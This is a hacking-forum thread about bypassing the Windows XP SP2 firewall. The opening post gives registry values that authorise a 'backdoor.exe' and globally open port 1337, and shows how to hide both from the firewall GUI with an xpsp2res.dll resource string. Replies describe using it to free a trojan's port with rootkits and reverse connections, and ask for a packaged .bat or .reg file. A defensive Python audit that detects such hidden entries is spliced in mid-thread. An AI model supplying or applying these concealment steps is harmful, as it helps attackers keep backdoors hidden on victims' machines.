da_cash
We can bypass the Windows firewall using the registry.

Just open regedit.exe and go to

CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


As you can see, the SharedAccess service (aka Windows Firewall) contains the names of applications allowed for outbound connections.

To give access to the desired application we need to add a similar key:
CODE
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled"


But then our "backdoor" will be listed in the Firewall GUI's allowed applications.

Anyway, we may hide it by doing this:

CODE
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"



We can also globally open any port we want:
CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List


by adding a similar value inside this registry key:

CODE
"1337:TCP"="1337:TCP:*:Enabled:Name"


where "Name" is the name we want to be shown in the GUI.

To hide the port from the listing in the GUI we may do something like this:


CODE
"1337:TCP"="1337:TCP:*:Enabled:@xpsp2res.dll,-22003"


and then the port will be hidden from the listing (XP SP2).



It works on XP SP2; I didn't test it on any other OS.

This method is used by some malware/spyware manufacturers, and together with a rootkit it may be really dangerous.
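A defender-side example, added here and not part of the thread: a small Python audit that parses an exported .reg dump of the two List keys discussed above and flags enabled entries whose display name is an @xpsp2res.dll,-NNNN resource string but which are not in an assumed baseline of stock entries, plus entries whose value name and target disagree. The sample export, the KNOWN_LOCALIZED baseline and sessmgr.exe as the Remote Assistance entry are constructed assumptions for the demo; build the real baseline from a clean reference host.

```python
import re

# Constructed .reg export of the two XP SP2 lists from the post (sample data, not a real host)
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\system32\\sessmgr.exe"="C:\\WINDOWS\\system32\\sessmgr.exe:*:Enabled:@xpsp2res.dll,-22019"
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"
"C:\\Program Files\\App\\app.exe"="C:\\Program Files\\App\\app.exe:*:Enabled:App"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"1337:TCP"="1337:TCP:*:Enabled:@xpsp2res.dll,-22003"
"139:TCP"="139:TCP:*:Enabled:@xpsp2res.dll,-22004"
'''

# Assumed baseline: value names that legitimately carry an @dll,-id localized display name on a
# stock XP SP2 box (sessmgr.exe = Remote Assistance is an assumption; the port id is constructed).
KNOWN_LOCALIZED = {"C:\\WINDOWS\\system32\\sessmgr.exe", "139:TCP"}

_LINE = re.compile(r'^"(?P<name>.*)"="(?P<data>.*)"$')

def parse_reg(text):
    """Yield (list_type, value_name, data) for every value under the two firewall List keys."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            section = ("app" if "AuthorizedApplications" in line
                       else "port" if "GloballyOpenPorts" in line else None)
        elif section and (m := _LINE.match(line)):
            # .reg files double every backslash; undo that so names compare cleanly
            yield section, m["name"].replace("\\\\", "\\"), m["data"].replace("\\\\", "\\")

def audit(text):
    """Return (value_name, reason) findings for suspicious enabled entries."""
    findings = []
    for kind, name, data in parse_reg(text):
        if kind == "app":
            path, scope, mode, display = data.rsplit(":", 3)  # path contains "C:", so split from the right
            subject = path
        else:
            port, proto, scope, mode, display = data.split(":", 4)
            subject = f"{port}:{proto}"
        if mode.lower() != "enabled":
            continue
        if name != subject:
            findings.append((name, "value name and target disagree"))
        if display.startswith("@") and name not in KNOWN_LOCALIZED:
            findings.append((name, f"localized display name {display} hides a non-baseline {kind} entry"))
    return findings
```

Run it against `reg export` output of both keys; anything it returns deserves a look at the file on disk and at who created the value.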
Jumpi
I use it to free the port my trojan uses. It works with a single command line; I'm gonna look for it when I'm at home again.

A reverse connection was never stopped by the SP2 firewall; this seems to be the best method at the moment because you don't see anything strange in the firewall settings.
o0oKARo0o
It does work, excellent tip.
knull
good, good, good...

BN says:
This was the 3rd useless post in 21 posts. Disabled account 28 days. Any other takers?
o0oKARo0o
Actually it works, but it's still in the list, under Remote Assistance. Any ideas?
And using a rootkit afterwards, the connection isn't allowed by the firewall anymore due to the nonexistence of the program...
ninar12
One question: why don't you use "netsh"?

netsh firewall ...

Much more comfortable.

But I don't know if it's a native command under NT; on XP I'm sure it works.
Lie8
Very, very good tut.... Thanks.

BN says:
This person had 3 useless posts out of 10. Another 28-day winner!
dw-chow
Nice, but one question still remains... is it possible to get through it by remote means?
bah
Actually I have another question. I checked on win3k for the reg keys and couldn't find any, even though Windows Firewall was up and applications had been added to the exempt list from the GUI. So where are the win3k reg keys, and does the :@xpsp2res.dll,-22003 work under w3k?
AdmiralB
Maybe someone can compile it into a nice bat file.
smith_john
Nice topic.


From Packet: Sounds like a thx post to me! Warning points added. And from a chronic thanks poster so muchos suspend too.
Jackson
Hello, really good idea!! However, somebody can pack it in a regfile, then one only has to explain it! And how is that with other firewalls, does this function there too??
Invision Power Board © 2001-2005 Invision Power Services, Inc.